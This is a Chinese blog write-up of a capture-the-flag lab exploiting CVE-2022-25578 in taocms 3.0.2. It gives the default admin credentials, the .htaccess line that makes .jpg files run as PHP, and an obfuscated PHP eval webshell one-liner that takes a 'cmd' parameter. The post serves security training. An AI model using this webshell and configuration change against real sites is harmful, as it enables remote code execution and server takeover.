【春秋云境】CVE-2022-25578靶场WP

最新推荐文章于 2023-11-15 23:20:20 发布
最新推荐文章于 2023-11-15 23:20:20 发布
阅读量570 收藏 3
点赞数 1
分类专栏: 春秋云镜 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128102489
版权

【春秋云境】CVE-2022-25578靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
2.开启靶场

请添加图片描述

3.登录后台
  • 后台地址/admin,百度搜taoCMS的默认账号密码,admin:tao即可进入
    请添加图片描述
4.修改配置

  • 点击文件管理,编辑.htaccess文件,添加以下代码并保存文件。这段代码的意思是把.jpg的文件当成php文件解析

    AddType application/x-httpd-php .jpg

    请添加图片描述

5.上传木马

  • 保存后点击添加文章,上传缩略图,添加后缀为.jpg的木马

    <?php class G6MdvLsT { public function __construct($HF24f){ @eval("/*Z196iMYYE9*/".$HF24f.""); }}new G6MdvLsT($_REQUEST['cmd']);?>

    请添加图片描述

6.连接webshell
  • 上传成功后,可以看到文件的路径,然后使用webshell工具进行连接,在根目录下找到flag
    请添加图片描述
    请添加图片描述

成功获得flag

果粒程1122
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋云境CVE-2022-25578(文件包含)
m0_65712192的博客
04-21 946
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
春秋云境靶场CVE-2022-25578漏洞复现(利用htaccess文件进行任意文件上传)
最新发布
zyh1588的博客
11-15 864
小白复现CVE-2022-25578漏洞
CVE-2022-25578
qq_53768710的博客
03-04 348
CVE-2022-25578 taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
云镜CVE-2022-25578复现
m0_46684679的博客
02-09 399
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
春秋云境CVE-2022-25578
一只爱吃橙子的羊
11-30 1317
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
mybatisplus版本引发的连接泄漏血案
沉迷Spring的博客
05-19 3107
上周几次接到同事电话说线上环境用户登陆失败,我一查线上日志看到很多Connection timeout的错, 因为我们用到了HikariCP连接池,理论上来说不会出现连接泄漏的问题,我就加了HikariCP的leakDetectionThreshold连接泄漏检测配置。 今晚又被提示说登陆不上了,我一看日志,果真如提前预料的那样也是Connection timeout的错,但是这次竟然日志中没有出现Apparent connection leak detected类似的字样,甚是奇怪。 其实在去年年底的时候
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 421
春秋云镜 CVE-2022-25578
taocms 代码注入 (CVE-2022-25578)复现
weixin_63124284的博客
10-21 599
2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
taocms 代码注入 (CVE-2022-25578
weixin_57567689的博客
10-21 768
taocms 代码注入 (CVE-2022-25578
编辑.htaccess文件执行任意代码(CVE-2022-25578
热门推荐
Battery的博客
09-23 6万+
CVE-2022-25578是Taocms v3.0.2中存在的一个安全漏洞,该漏洞允许攻击者通过任意编辑.htaccess文件来执行代码注入攻击。Taocms是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小且功能完善的基于php+SQLite/Mysql的CMS管理系统。该系统体积小、速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能,且跨平台运行,支持SAE、BAE云服务,以及阿里云虚拟主机。
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 192
春秋云镜 CVE-2022-25578
春秋云境CVE-2022-25578
ZXW_NUDT的博客
02-22 2488
春秋云境CVE-2022-25578
Taocms 代码注入漏洞(CVE-2022-25578
千寻的博客
12-01 1671
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
春秋云境CVE-2022-29464
09-05
- *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值